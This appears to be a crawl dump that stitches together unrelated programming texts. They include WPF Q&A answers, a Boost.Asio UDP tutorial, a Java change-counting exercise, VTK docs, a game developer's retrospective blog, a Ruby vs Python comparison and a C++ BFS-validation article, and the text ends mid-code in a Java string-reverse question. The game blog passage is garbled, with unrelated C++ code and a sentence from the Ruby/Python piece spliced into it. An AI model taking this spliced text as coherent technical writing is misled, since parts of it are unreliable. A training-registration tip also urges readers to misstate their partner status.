      System.out.println("reverse = " + buff.reverse());

      // the reverse of a palindrome is equivalent to the actual buffer
      buff = new StringBuffer("malayalam");
      System.out.println("buffer = " + buff);

      // reverse characters of the buffer and print it
      System.out.println("reverse = " + buff.reverse());
   }
}

Output:

buffer = tutorials point
reverse = tniop slairotut
buffer = malayalam
reverse = malayalam

The following example shows how to reverse an arbitrary String. The program buffers the input String using the StringBuffer(String string) constructor, reverses the buffer, and then converts the buffer back into a String with the help of the toString() method.

public class Sample {
   public static void main(String args[]) {
      String str = new String("Hello how are you");
      StringBuffer sb = new StringBuffer(str);
      String str2 = sb.reverse().toString();
      System.out.println(str2);
   }
}

Output:

uoy era woh olleH
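StringBuffer.reverse() does all the work internally. Purely for illustration, the same reversal can be done by hand with a char array; the reverseManually helper below is our own sketch, not part of the original answer:

```java
public class ManualReverse {
    // Reverses a string by swapping characters from both ends of a char array.
    public static String reverseManually(String input) {
        char[] chars = input.toCharArray();
        for (int i = 0, j = chars.length - 1; i < j; i++, j--) {
            // swap chars[i] and chars[j]
            char tmp = chars[i];
            chars[i] = chars[j];
            chars[j] = tmp;
        }
        return new String(chars);
    }

    public static void main(String[] args) {
        System.out.println(reverseManually("tutorials point")); // tniop slairotut
        System.out.println(reverseManually("malayalam"));       // malayalam
    }
}
```

In practice, prefer the built-in StringBuffer (or StringBuilder) reverse(); the manual version only shows what happens under the hood.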
https://www.tutorialspoint.com/How-to-reverse-String-in-Java
CC-MAIN-2018-30
refinedweb
221
58.38
A scope is a region of the program, and broadly speaking there are three places where variables can be declared −

Inside a function or a block, which are called local variables.

In the definition of function parameters, which are called formal parameters.

Outside of all functions, which are called global variables.

We will learn what a function and its parameters are in subsequent chapters. Here let us explain what local and global variables are.

Variables that are declared inside a function or block are local variables. They can be used only by statements that are inside that function or block of code. Local variables are not known to functions outside their own. Following is an example using local variables −

#include <iostream>
using namespace std;

int main () {
   // Local variable declaration:
   int a, b;
   int c;

   // actual initialization
   a = 10;
   b = 20;
   c = a + b;

   cout << c;

   return 0;
}

When the above code is compiled and executed, it produces the following result −

30

Global variables are defined outside of all functions, usually at the top of the program. A program can use the same name for a local and a global variable, but inside a function the value of the local variable takes preference −

#include <iostream>
using namespace std;

// Global variable declaration:
int g = 20;

int main () {
   // Local variable declaration:
   int g = 10;

   cout << g;

   return 0;
}

When the above code is compiled and executed, it produces the following result −

10

When a local variable is defined, it is not initialized by the system; you must initialize it yourself. Global variables are initialized automatically by the system when you define them as follows −

Data Type    Initial Default Value
int          0
char         '\0'
float        0
double       0
pointer      NULL

It is a good programming practice to initialize variables properly, otherwise sometimes a program will produce unexpected results.
https://www.tutorialspoint.com/cplusplus/cpp_variable_scope.htm
CC-MAIN-2022-21
refinedweb
263
61.26
Joins

Joins are used to join a list with a particular character or a sequence of characters.

letters = ['a', 'b', 'c', 'd']
print " ".join(letters)    # Prints a b c d
print "+++".join(letters)  # Prints a+++b+++c+++d

TRY IT OUT

Try out the example given below and see the result you are getting. First go through the code and try to predict the answer that will appear in the console, then run the code to verify whether the value in the console matches the answer you worked out while reading the code.

boat = []
for i in range(5):
    boat.append(["P"] * 5)

def print_boat(boat):
    for item in boat:
        print " ".join(item)

print_boat(boat)

You now have a fair bit of knowledge on how to take data from the user and how to make a list. Using this, try to write a program which takes the number of rows and the number of columns from the user and makes a matrix of size row*col.

Hint:

row = int(raw_input("Guess Row:"))
col = int(raw_input("Guess Col:"))
# Now define the logic to make a matrix of row*col size.

IF ELSE

Suppose you go to a shop and you want to buy only fruits if you have between 10 and 20 dollars, and you want to buy fruits and vegetables too if you have more than 20 dollars. How will you go about coding such a problem? You will need if, elif and else conditions to write the code for it. An if or elif clause can also combine more than one condition, linked with 'and' and 'or'.

Example:

if money > 10 and money < 20:
    shop_fruits()
elif money > 20 and money < 40:
    shop_fruits_and_vegetables()
else:
    shop_everything()

NOTE: We always use a colon (':') to indicate the end of an if, elif or else clause while writing our code.

TRY IT OUT:

Question: Write a program to take the number of people, cars and trucks from the user. If cars are greater than people, print "We should take the cars."; if cars are fewer than people, print "We should not take the cars."; and in all other scenarios print "We can't decide."

Solution:

people = int(raw_input("Enter number of people"))
cars = int(raw_input("Enter number of cars"))
trucks = int(raw_input("Enter number of trucks"))

if cars > people:
    print "We should take the cars."
elif cars < people:
    print "We should not take the cars."
else:
    print "We can't decide."

Python tuples

A tuple is another sequence data structure that is used to store data. A tuple consists of a number of values separated by commas, just like lists, but they are enclosed with '(' and ')'. The major difference between tuples and lists is that tuples cannot be updated, only accessed, whereas lists can be both accessed and updated. Tuples can be used to store a username which must not be altered. A tuple can be thought of as a permanent list, used only for storing and accessing values.

tuple = ('hello', 'python!', 'You', 'rock!!!!', 7)
list = ['hello', 'python!', 'You', 'rock!!!!', 7]

print tuple        # Prints the complete tuple
print tuple[3]     # Prints the fourth element of the tuple
print tuple[2:3]   # Prints the third element (slice from index 2 up to, not including, index 3)
print tuple[2:]    # Prints elements starting from the third element

tuple[1] = 'java'  # This will throw an error as a tuple can't be updated
list[1] = 'java'   # Updates the 2nd element of the list to 'java'
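A possible solution to the matrix exercise above can be sketched with a make_matrix helper (the function name and the fill value "P" are our own choices; in the exercise itself you would read rows and cols via raw_input as shown in the hint):

```python
def make_matrix(rows, cols, fill="P"):
    """Build a rows x cols matrix (a list of lists) filled with `fill`."""
    matrix = []
    for _ in range(rows):
        matrix.append([fill] * cols)
    return matrix

def print_matrix(matrix):
    # Print each row joined with spaces, just like print_boat above.
    for row in matrix:
        print(" ".join(row))

m = make_matrix(2, 3)
print_matrix(m)
# P P P
# P P P
```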
http://knowledgetpoint.com/python/python-fundamentals/
CC-MAIN-2017-34
refinedweb
576
67.28
Crosshair

The crosshair is a pointer represented by two mutually-crossing lines stretched over the entire chart plot. The crosshair helps a user identify the values of the series points precisely. When enabled, the crosshair follows the cursor and snaps to the nearest series point.

To enable the crosshair, set the crosshair.enabled option to true. To show the crosshair labels, do the same with the crosshair.label.visible option.

jQuery

JavaScript

$(function() {
    $("#chartContainer").dxChart({
        // ...
        crosshair: {
            enabled: true,
            label: {
                visible: true
            }
        }
    });
});

Angular

HTML

<dx-chart ... >
    <dxo-crosshair [enabled]="true">
        <dxo-label [visible]="true"></dxo-label>
    </dxo-crosshair>
</dx-chart>

TypeScript

import { DxChartModule } from "devextreme-angular";
// ...
export class AppComponent {
    // ...
}
@NgModule({
    imports: [
        // ...
        DxChartModule
    ],
    // ...
})

For information about all the options of the crosshair and its labels, visit the crosshair section of the documentation.
https://js.devexpress.com/Documentation/19_1/Guide/Widgets/Chart/Crosshair/
CC-MAIN-2021-39
refinedweb
126
52.76
Codementor PHP expert Ben Edmunds joined us for an Office Hour session to share some of his knowledge in PHP security. Ben Edmunds is the co-host of PHP Town Hall and the creator of Ion Auth, a CodeIgniter authentication library. Ben has also authored the book "Building Secure PHP Apps".

The text below is a summary done by the Codementor team and may vary from the original video; if you see any issues, please let us know!

The topics we'll be covering are as follows:

- Exceptions
- Closures
- Namespaces
- Statics
- Short Array Syntax
- PDO for SQL and databases
- Security
- Legit Tools

A Quick Introduction

To better follow the security tips later, there are a few core concepts to understand, so here is a quick overview of what modern PHP looks like.

Exceptions

To catch an exception, a try catch block is recommended. Instead of returning a mere error code, the block surfaces an exception describing what went wrong, which saves programmers from having to do constant trial and error to test how things respond.

try {
    // your code goes here
} catch (Exception $e) {
    die($e->getMessage());
}

An example of a try catch block. The real key is the exception object that is caught, as it can be one of many different exception classes and does not have to be a generic one.

Closures

In previous years with PHP, functions had to be named. Now, like JavaScript, PHP also supports closures, or anonymous functions.

Route::get('/', function() {
    return View::make('index');
});

A Laravel-style example of a closure. In the example above, the function returning the index view is passed for just one-time use. What should be noted is that there is some difference in scoping between PHP and JavaScript closures. In JavaScript, this constantly changes based on how deeply callbacks are nested, but PHP doesn't have that issue. Instead, PHP has the "use" keyword, which gives access to external variables inside callbacks.
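As a quick illustrative sketch of that "use" keyword (our own example, not from the talk):

```php
<?php
// A closure can capture an external variable with "use".
$greeting = 'Hello';

$greet = function ($name) use ($greeting) {
    // $greeting is captured by value at the moment the closure is defined.
    return $greeting . ', ' . $name . '!';
};

echo $greet('Ben');  // Hello, Ben!
```

Without the `use ($greeting)` clause, $greeting would be undefined inside the closure, which is the scoping difference from JavaScript mentioned above.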
Namespaces

Namespaces are logical groups or containers for similar objects. When using two different libraries that share the same class name, which would interfere with each other and make things confusing, namespaces should be used.

namespace Illuminate\Console;

class Command {
    // ...
}

use Illuminate\Console\Command;

In this example, the Command class is defined as part of the Illuminate\Console namespace. At the bottom is the statement to begin using the namespaced class; after "use", one can call the class as one normally does. Namespaces can go as deep as a coder wants, and the idea behind namespaces is to put pieces of code under one container that serves as a separator and also makes it easier to figure out where things come from. For example, when injecting different things into a controller, namespaces make it possible to check back and make sure which class is used (e.g. the DB class, the Illuminate DB class, or some other DB class someone else put in, etc.).

Statics

The use of statics is controversial in the PHP world because of how often they were used inappropriately. However, a good situation to use statics is when there are small related functions that don't need object-oriented inheritance. Static functions are self-contained and don't need much of a scope. A good example of when to use statics is a form helper with no form object to call on. A form helper would consist of shortcuts for creating a form, inputs, etc., which is just calling functions inside the view to build out the HTML.

A bad example is to use statics to retain state, i.e., building an object to add and remove things from, where the scope and state of the object is retained through time. Although there are ways to hack around this issue, such as using statics as a shortcut to IoC, the general consensus is to stick with convention to avoid confusing other programmers who may be sharing the project.

class Route
{
    public static function get()
    {
        // ...
    }
}

Route::get();

The double colon in the example is what makes it a static call instead of an instance call, which uses an arrow. In this static example, the code calls directly on the class without having to instantiate an object first. Furthermore, there is no $this object inside of a static, and there's a difference in the scoping of variables depending on whether they are defined inside or outside of a static, whether they're part of the parent class or not, etc. Thus, it may be worthwhile to read up on how scoping works inside statics.

Short Array Syntax

Although rather inconsequential, this neat new feature is a blessing to lazy coders as well as those who are used to coding in JavaScript. Basically, instead of having to write the following:

$array = array(
    0 => 'value1',
    1 => 'value2',
);

One can now just use brackets like this:

$array = [
    0 => 'value1',
    1 => 'value2',
];

PDO

PDO has been slowly gaining popularity in recent years, so it is now normal to see it used. It's a nice class and a great way of handling database abstraction, as it gives a good database layer that works across different databases. For example, since PDO is cross-system, both PostgreSQL and MySQL have the same API for interacting with PDO.

The systems that support PDO are:

- MS SQL
- MySQL
- Oracle
- PostgreSQL
- SQLite
- CUBRID
- Firebird
- Informix
- ODBC & DB2
- 4D

$stmt = $db->prepare('
    SELECT *
    FROM users
    WHERE id = :id
');
$stmt->bindParam(':id', $id);
$stmt->execute();

The :id in the example is a placeholder for a variable, and the bindParam call attaches the id variable before the statement executes. At first it may seem like pointless extra work to bind the id variable instead of sticking it directly into the query, but the difference is that doing so will automatically escape the value for you.
The code also runs through a different execution path: whether the query has a single WHERE clause or several chained conditions, a bound parameter cannot break out of the part of the query it belongs in. In contrast, a straight SQL query that does not escape its input can be terminated early by an attacker, for example by injecting a quote followed by a DELETE statement, and users would be deleted. As this sort of attack is stopped by parameter binding, it is highly recommended to use it; it makes life easier and code safer. The language can handle security, so there is no need to be self-reliant.

Security

After the overview, hopefully you now have a better idea of what modern PHP is, and will have an easier time understanding the biggest security issues it currently faces:

- SQL injection
- HTTPS
- Password hashing
- Authentication
- Safe defaults
- XSS & CSRF

SQL Injection

A SQL injection takes data and manipulates an identifier, and this sort of attack is commonly seen in forum posts. Some assume that, since a post form has a hidden input with the post ID, a user can't change the post ID because it is hidden. The assumption is wrong: anyone can copy the form, inspect it in their web browser, and change anything they want before they submit it. Thus, any input from a user cannot be trusted and could be bad, malicious, or incorrect data.

An example of the problems that arise when users input incorrect data is a database column defined as VARCHAR(10). If input is not properly checked, a user who sends something over the maximum length, say 11 characters, will not have their input stored as expected. It helps to think about whether the data is expected and valid, and then handle it through validation, typecasting, trimming, or the like. Another thing to keep in mind is that MySQL will just truncate the characters that exceed the maximum length, while PostgreSQL will throw an exception instead, so unchecked input eventually leads to false data.
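The validate/typecast/trim idea above can be sketched as follows (our own example; the column length of 10 is assumed to match the VARCHAR(10) case, and cleanName is a hypothetical helper name):

```php
<?php
// Typecast: an id should always be an integer, never raw request input.
$id = (int) ($_POST['id'] ?? 0);

// Trim and length-check a name destined for a VARCHAR(10) column,
// rejecting it in code instead of letting the database truncate or error.
function cleanName($raw, $maxLen = 10) {
    $name = trim((string) $raw);
    if ($name === '' || strlen($name) > $maxLen) {
        return null;  // invalid: the caller should show a validation error
    }
    return $name;
}

var_dump(cleanName('  Ben  '));         // string(3) "Ben"
var_dump(cleanName('waaaay too long')); // NULL
```

Doing the check in code keeps the behavior identical whether the database underneath is MySQL or PostgreSQL.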
Therefore, it is always better to handle any restrictions on data in the code when possible, to prevent invalid data from getting into the database. Escaping input before it goes into the database will protect the database from SQL injection. Escaping output is also important, as one never knows what a user will submit (e.g. HTML, JavaScript, etc.) and what will happen when that input is displayed directly back on the page. htmlentities() will be the go-to function 90% of the time for cleaning data up before it is put back onto the screen. And, as mentioned previously, PDO makes it extremely easy to bind parameters.

// escaping input
$stmt->bindParam(':id', $id);

// escaping output
htmlentities($_POST['name']);

Thus, binding parameters with PDO handles SQL injection for the programmer. If using a different or older library, PHP still has built-in functions for escaping. In conclusion, simply use built-in functions to deal with SQL injection, as the PHP developers will have thought of more use cases and hit more server quirks than any single programmer.

HTTPS/SSL

For safe end-to-end encryption, HTTPS/SSL is the easiest and most secure option. It encrypts traffic across the wire, including who is the sender and who is the receiver. Anything that goes through the "pipe" once the connection is made will be secure, as it is encrypted and no one can look in on it. As certificates are required, it is important to make sure both sides have valid certificates, though this can be expensive depending on where one gets them. For example, the average is probably around $1000 for a certificate, but many shared hosts such as DNSimple have special plans and offer an SSL certificate for $20/month. Naturally it is safer to buy from a certificate authority, as it is then possible to transfer between servers or DNS hosts, but if saving money is more important, it is a good idea to check the offers made by one's host.
Another solution is to create a certificate yourself and ask users to download it to their computer, but this method is not recommended, as careful users know not to trust random authorities from websites they don't know.

Authentication

A problem arises when a login screen does not check whether a user is qualified to enter the administrator panel, and simply assumes a user to be an administrator if they manage to get in. This makes a site vulnerable to a malicious user who guesses the administrator panel URL or finds a way to scrape it, and consequently finds a way into the administrator panel. A way to counter this issue is to check access in the constructor of the administrator panel's controller.

// authentication - access control
if (!$user->inGroup('admin')) {
    return 'ERROR YO';
}

Pull in the current user through the constructor and check whether they have authorized access to the controller. If the user does not have authorized access, return some type of error, redirect them to an error page, or take them back to where they should be. Try to check their access as soon as possible instead of waiting until right before the view is displayed, as they may still be able to access the admin panel. The sooner an unauthorized user is taken out of the execution path, the safer it will be for future changes.

Another login issue many will miss is brute forcing. If there is no protection against brute forcing, it is trivial to break into anyone's account, as up to 90% of users use the same password everywhere, and worse, those passwords might be on the list of the most popular passwords in use. If a site has no check against brute forcing, someone can run a brute-force login tool against the site and be inside users' accounts in minutes or hours. The simplest way to prevent brute forcing is to track login attempts within a certain period of time.
// authentication - brute force
if ($user->loginAttempts > 5) {
    return 'CAUGHT YA';
}

For example, limit the number of login attempts to 5 tries in 10 minutes, or whatever is reasonable. Curbing the number of login attempts within a big enough period slows down anyone trying to hack into a website, making it too costly for the attacker to continue. A good way to do that is to keep both an IP list and a username or email list, as this makes it clear when the same IP tries to hit several different user accounts, and it is then easier to block that IP. It should be noted, however, that in a company setting this method should be approached with more care, as many users in the same building share the same public IP because they all route through it to get out of the building. If that is a concern, it is a good idea to raise the limit on login attempts to a much higher count.

Safe Password Hashing

PHP programmers no longer need to hand-roll md5 or SHA1 hashing, as PHP now includes safe, built-in password hashing, which uses the newest, most secure, or most accepted hashing algorithm. PHP provides a common API to use now and in the future for password hashing, including a function to verify the correct password.

// safe password hashing
password_hash($_POST['pass'], PASSWORD_DEFAULT);

// password verification
password_verify($_POST['pass'], $u->pass);

The first call is used when storing the password into the database, while the second is used in the login function. In the example above, whatever the user types into the login screen is passed in, and the stored hash is pulled out of the database to see whether the two match. As only the hash is stored in the database, no plain-text password is kept. Furthermore, as there is a unique salt in the algorithm for every user, different users with the same password still get different hashes.
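The hash-and-verify round trip above can be shown as a runnable sketch (a standalone example; the stored-user object from the snippet is replaced by a plain variable):

```php
<?php
// Hash at registration time; the salt is generated and embedded automatically.
$storedHash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);

// Verify at login time: the salt is extracted from the stored hash and reused.
var_dump(password_verify('correct horse battery staple', $storedHash)); // bool(true)
var_dump(password_verify('wrong guess', $storedHash));                  // bool(false)

// Two users with the same password still get different hashes (unique salts).
$otherHash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);
var_dump($storedHash === $otherHash); // bool(false)
```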
When verifying, the salt is pulled back out of the stored hash and the supplied password is rehashed with the same salt.

Safe Defaults

A common problem many have encountered is a variable that starts with a certain value but, after passing through a different controller method, ends up with a value that is not what was expected. It is best to define the default value as soon as possible, ideally at the top of the controller.

//safe defaults
class YourController {
    protected $var1 = 'default value';
    function __construct() {
        ...
    }
}

If more mutations or work are needed, do them in the constructor. Certifying the default values as early as possible prevents the logic below from being thrown off.

//safe defaults
$something = false;
foreach ($array as $k => $v) {
    $something = $v->foo;
    if ($something == 'bar') {
        ...
    }
}

This foreach is vulnerable: if for some reason the initialization has not been hit because the code was reached through a different path, the logic is thrown into a loop, since the value was expected to be false by default. When defining defaults, be explicit; this makes it easier for other developers on the same project to understand what the default value should be without having to know what is going on inside the foreach.

XSS

Cross-site scripting is a common attack that exploits URLs that are not properly escaped. Take a simple paging URL: if someone can guess the URL, changes it to page_num=2&action=delete, and the page accepts it for some reason, there is trouble. It is important to escape URLs properly, since anyone can watch the URLs, see what is happening in them, and eventually use them to perform certain actions. An example of a potential threat is a malicious user who creates a test account, deletes the account, and figures out the URL that does so.
In a non-persistent XSS attack, the malicious user then generates the URL to delete a user account with someone else's user ID and sends the URL to that user, either through a link on another site or in an email. The unknowing user, who is still logged in with a valid account and session data, clicks on the link and ends up deleting their own account.

In a persistent XSS attack, the payload is saved on the website's server and may be presented as a post containing HTML or JavaScript. For example, it could be a Facebook status: a user comes back to look at a page with that status and ends up running something nefarious.

XSS can usually be prevented with the following method:

<h1>Title</h1>
Hello <?php echo htmlentities($name); ?>

Anything generated by a client or user should be escaped before it is displayed back.

Cross-Site Request Forgery

CSRF is similar to an XSS attack, but slightly different. One way to understand CSRF is as a form that responds to anything: a post/put/update/delete action does not necessarily respond to HTTP verbs, but rather to the actual action being performed. If data is being changed, it needs to be behind a form protected by a token that can only be used once, also known as a nonce. This ensures the action was initiated by the user and came from a form recently supplied by the website.

function generateCsrf() {
    $token = mcrypt_create_iv(16, MCRYPT_DEV_URANDOM);
    Session::flash('csrfToken', $token);
    return $token;
}

if ($_POST['token'] == Session::get('csrfToken')) { ... }

The example above shows how to use tokens: the generated token is placed in a hidden field in a form. The code generates a unique token, saves it into the session, and returns it so it can be put into the form. After the form is posted, the submitted token is checked against the one stored in the site's session. Basically, nonces make forms good for only one use.
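The same generate-store-verify cycle can be sketched outside PHP. Here is a minimal Python version (the session is modeled as a plain dict; function names are mine, not from the article) that also makes the token single-use by removing it on verification:

```python
import secrets

def generate_csrf(session):
    # Create an unpredictable token and stash it in the session,
    # ready to be embedded as a hidden form field.
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token

def check_csrf(session, submitted):
    # Pop the token so it is good for exactly one use (a nonce),
    # and compare in constant time to avoid timing leaks.
    stored = session.pop("csrf_token", None)
    return stored is not None and secrets.compare_digest(stored, submitted)
```

Note the constant-time comparison: the article's `==` check works, but a timing-safe comparison is the safer habit for any secret value.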
However, single-use tokens can cause problems if there are two forms on a page or the page uses AJAX. The simplest solution is to store an array of valid tokens for a session and have a garbage collection routine delete the tokens after some seconds or minutes (e.g., all tokens are good for five minutes before they expire).

Legit Tools

Ruby has had cool tools for a long time, but PHP finally has some legit tools as well, and Ben shared his thoughts about them with us.

Built-in Web Server

There is now a built-in server for local development: sites can be tested by running php -S on the host, which serves them out on a port. To see the site, just open a browser and type in localhost:8000. This server is not resilient, so it is not recommended for production, but it is a great way to test something locally. Furthermore, the built-in web server makes it easy to switch between projects without having to maintain a list of host entries.

Composer

Composer is finally a good, secure package manager for PHP with a sane format.

// composer.json
{
    "require": {
        "stripe/stripe-php": "dev-master",
        "twilio/sdk": "dev-master"
    }
}

All one needs to do is define a composer.json file stating which packages should be pulled in, and then run a couple of simple commands to get set up and going.

$ php composer.phar update
$ php composer.phar install

There is a simple update or install command for any changes since Composer was last used. There are also advanced uses, such as lock files that pin the exact dependency versions in place so they can be reproduced on the servers and across the rest of one's team. Furthermore, Composer also has an autoloader built in.

$client = new Services_Twilio($sid, $tkn);
$client->account
    ->messages
    ->sendMessage(...);

The autoloader is a great addition, as it knows how to look up a file based on the way things are namespaced.
Thus, the PHP coder no longer has to worry about figuring out the whole path down into a certain class in a certain library he or she has never used.

Unit Testing

There are a lot of tools coming out for unit testing (at last!), and here is just a very small selection of the more popular ones:

- PHPUnit (strict unit testing)
- Selenium (browser testing)
- CodeCeption (BDD testing)
- Behat (BDD testing)
- Mink (Web acceptance testing)
- PHPSpec (Inspection testing)

All these tools exist to make sure the program does what is expected of it.

class ApiAuthTest extends PHPUnit_Framework_TestCase {
    public function testVerify() {
        $auth = new ApiAuth();
        $this->assertTrue($auth->verify());
    }
}

$ phpunit tests
PHPUnit 3.3.17 by Sebastian Bergmann.
Time: 0.01 seconds
OK (1 test, 1 assertion)

This is a simple test case verifying API authentication. Here the response of the function is expected to be true; in a case where it is expected to be false, assertFalse should be used instead. It is also possible to assert that the response equals a certain value. The point of a unit test is to ensure every component in the code behaves properly with valid and invalid data, and returns what is expected in each case.

The other tools listed are mostly for acceptance testing, which confirms not only that individual components work, but that the entire system works together. Acceptance testing is usually done through a browser or a command-line tool to check the interactions in the system and whether the final output turns out as expected.

To run the tests, simply run phpunit, which will go through and run all the tests in the test folder. At the end it reports how many tests and assertions there were, as well as any errors.

Resources

PHP.net is the best resource for looking up functions, methods, or anything built into the language.
PHPtheRightWay is a website, and recently a book, that comes highly recommended. It was created by Josh Lockhart, who also created the Slim Framework for PHP, and the PHP community has come together to work on this resource to let people know what modern PHP looks like.

Recommended Modern Frameworks

Building Secure PHP Apps

And finally, of course, Ben's book is also a great resource. It's a short read at around 200 pages. The topics covered here are explained in much more detail, and you can use the coupon code "codementor" to get $3 off!

Other posts in this series with Ben Edmunds:

- Should PHP Developers Also Handle DevOps?
- Tutorial: The Best Way to Store Passwords in a Database
- Q&A With PHP Security Expert Ben Edmunds
- The Most Common Reason a Hacker Attacks Your PHP Applications

Need Ben's help? Book a 1-on-1 session, or join us as an expert mentor!
https://www.codementor.io/php/tutorial/building-modern-secure-php-applications
Lazy evaluation in Haskell

Elias Hernandis

Cover image by Andreas Kay licensed under CC BY-NC-SA 2.0. A version of this article previously appeared in my blog. This article is part of a series on Haskell about how easy it is to define infinite structures in really concise ways.

Lazy evaluation is an evaluation strategy that is the foundation of many features of Haskell, from performance to expressiveness. In this first article, we explore the different evaluation strategies found in other languages, how they compare to Haskell's, and their benefits and drawbacks. No Haskell knowledge is required for this first post :)

Call me by your value

When discussing different families of programming languages, we sometimes use the phrase call-by-value to refer to how parameters are passed to a function when it is called. Consider the following code in a generic language:

def f(a, b):
    return a * 2

If we say the language is call-by-value, we mean that the variables a and b are evaluated before copies of them are passed to the function f. For instance, if we called f with arguments a = 2 + 3 and b = 3 * 3, the following would happen in a call-by-value language:

f(a, b) = f((2 + 3), (3 * 3))
        = f(5, (3 * 3))
        = f(5, 9)
        = 5 * 2
        = 10

It takes roughly 5 steps to compute the value f(a, b). Observe that even though the value of f depends only on the value of a, the parameter b is still evaluated. We call this evaluation strategy strict, because it does not care about the usefulness of the values; it just computes everything as a very stubborn robot would do. This is the case with some low-level languages like C.1

Call me by your name

What if we delayed evaluation until the parameters were actually needed? We call this call-by-name, and it is an example of a non-strict evaluation strategy. Let's look at how the previous computation would look with a call-by-name approach:

f(a, b) = f((2 + 3), (3 * 3))
        = (2 + 3) * 2
        = 5 * 2
        = 10

Wow! We saved one step!
This is not too much, but suppose that a and b weren't simple arithmetic expressions but complex computations instead. Then not computing b would certainly be beneficial. Is this always the case? Unfortunately, it turns out, it isn't. Look at the following definition and compare the two evaluations:

def square(a):
    return a * a

-- Call-by-value (strict) evaluation
square(a) = square((2 + 3))
          = square(5)
          = 5 * 5
          = 25

-- Call-by-name (non-strict) evaluation
square(a) = square((2 + 3))
          = (2 + 3) * (2 + 3)
          = 5 * (2 + 3)
          = 5 * 5
          = 25

Yikes! That's one more step. Now a natural question is: which evaluation strategy makes more sense? Call-by-name seems better since unused values are not computed... Also, why did we calculate (2 + 3) twice? Couldn't we have stored the value for the second calculation?

Call me lazy

It turns out that if we add sharing to call-by-name, the resulting strategy will never take more steps to evaluate an expression than call-by-value. We call this call-by-need, or lazy evaluation in the context of Haskell. Call-by-need is also a form of non-strict evaluation, but it has the added benefit of never introducing a performance penalty (well, at least in the number of steps2). Let's look at how the previous examples would look if we used call-by-need:

f(a) = f((2 + 3))
     = (2 + 3) * 2
     = 5 * 2
     = 10

square(a) = square((2 + 3))
          = (2 + 3) * (2 + 3)
          = 5 * 5
          = 25

We can see that in both cases the evaluation takes no more steps than call-by-value, and unused arguments are still skipped.

Closing words

Call-by-need, or lazy evaluation, is central to both the performance and expressiveness of the Haskell language. In addition, the Haskell compiler has purity and a strong type system at its disposal, enabling it to make much more aggressive optimisations than would be possible in other languages. More simply, expressiveness in Haskell does not come with a performance price to pay. In the following articles we will apply lazy evaluation to create infinite structures.
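Call-by-need is exactly call-by-name plus sharing, and that combination can be sketched in a strict language with a memoizing thunk: wrap the argument expression in a function, evaluate it at most once, and cache the result. A small Python sketch of the idea (the Thunk class is mine, used here only to mimic what a lazy runtime does):

```python
class Thunk:
    """A delayed computation that is evaluated at most once (sharing)."""

    def __init__(self, compute):
        self.compute = compute
        self.evaluated = False
        self.value = None

    def force(self):
        # First force runs the computation; later forces reuse the cached value.
        if not self.evaluated:
            self.value = self.compute()
            self.evaluated = True
        return self.value

evaluations = []

def square(a):
    # a is a Thunk: forcing it twice only runs the computation once.
    return a.force() * a.force()

# The (2 + 3) argument from the article; the append records each evaluation.
arg = Thunk(lambda: (evaluations.append(1), 2 + 3)[1])
result = square(arg)
```

An unused Thunk is never forced, which is the call-by-name half of the story; the cache is the sharing half.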
If you want to read more about evaluation strategies, you can check out this Wikipedia article.

1. Although in some languages we may substitute call-by-name with call-by-reference, the idea of strict evaluation still applies: all parameters are evaluated before the function call. The difference is that in call-by-reference the address of the value is passed instead of a copy of the value itself, allowing the function to modify it. ↩

2. It may, however, introduce a memory usage penalty, but these cases are rarer and easier to detect and fix, often just by rewriting the order of arguments. ↩
https://dev.to/knifecake/lazy-evaluation-in-haskell-15of
RL-ARM User's Guide (MDK v4)

#include <rtl.h>

int _init_box (
    void* box_mem,   /* Start address of the memory pool */
    U32 box_size,    /* Number of bytes in the memory pool */
    U32 blk_size );  /* Number of bytes in each block of the pool */

The _init_box function initializes a fixed-block-size memory pool. When the memory pool is initialized, the RTX kernel handles memory requests by allocating a block of memory from the memory pool.

The box_mem argument specifies the start address of the memory pool; this address must be 4-byte aligned. The box_size argument specifies the size of the memory pool, in bytes. The blk_size argument specifies the size, in bytes, of the blocks in the memory pool. You can set the block size to any value from 1 to box_size-12. However, blk_size is rounded up to the next multiple of 4 to maintain 4-byte address alignment of the blocks. For example, if you initialize a memory pool for 10-byte blocks, the _init_box function actually initializes the memory pool for 12-byte blocks.

The _init_box function is in the RL-RTX library. The prototype is defined in rtl.h.

Note

The _init_box function returns 0 if the memory pool was initialized without any problem. If there was an initialization error, it returns 1.

See also: _alloc_box, _calloc_box, _declare_box, _free.
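The rounding rule above is easy to check on paper: block sizes round up to the next multiple of 4, so a pool initialized for 10-byte blocks actually uses 12-byte blocks. Here is a small Python sketch of that arithmetic (the helper names are mine, not part of the RL-RTX API, and the capacity estimate simply assumes the 12-byte figure implied by the blk_size upper bound of box_size-12):

```python
def rounded_block_size(blk_size):
    # Round up to the next multiple of 4 to keep 4-byte alignment.
    return (blk_size + 3) // 4 * 4

def blocks_in_pool(box_size, blk_size, overhead=12):
    # Rough capacity estimate: subtract the assumed pool overhead,
    # then divide by the aligned block size.
    return (box_size - overhead) // rounded_block_size(blk_size)
```

So a 1012-byte pool of nominally 10-byte blocks holds roughly 83 blocks of 12 bytes each, not 100 blocks of 10 bytes.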
http://www.keil.com/support/man/docs/rlarm/rlarm__init_box.htm
Python - Delete all nodes of the Circular Doubly Linked List

Deleting all nodes of a circular doubly linked list requires traversing the list and deleting each node one by one. It requires creating a current node pointing to the next of head. Delete the current node and move to the next node using a temp node. Repeat the process until the current node becomes head. At last, delete the head. The function deleteAllNodes is created for this purpose. It is a 3-step process.

def deleteAllNodes(self):
    if self.head != None:
        #1. if head is not null, create a temp node
        #   and a current node pointed to next of head
        current = self.head.next
        while(current != self.head):
            #2. if current node is not equal to head, delete the
            #   current node and move current to next node using temp,
            #   repeat the process till current reaches the head
            temp = current.next
            current = None
            current = temp
        #3. Delete the head
        self.head = None
        print("All nodes are deleted successfully.")

Below is a complete program that uses the above-discussed concept of deleting all nodes of a circular doubly linked list, which makes the list empty with size zero.
# node structure
class Node:
    def __init__(self, data):
        self.data = data
        self.next = None
        self.prev = None

#class Linked List
class LinkedList:
    def __init__(self):
        self.head = None

    #Add new element at the end of the list
    def push_back(self, newElement):
        newNode = Node(newElement)
        if(self.head == None):
            self.head = newNode
            newNode.next = self.head
            newNode.prev = self.head
            return
        else:
            temp = self.head
            while(temp.next != self.head):
                temp = temp.next
            temp.next = newNode
            newNode.next = self.head
            newNode.prev = temp
            self.head.prev = newNode

    #delete all nodes of the list
    def deleteAllNodes(self):
        if self.head != None:
            current = self.head.next
            while(current != self.head):
                temp = current.next
                current = None
                current = temp
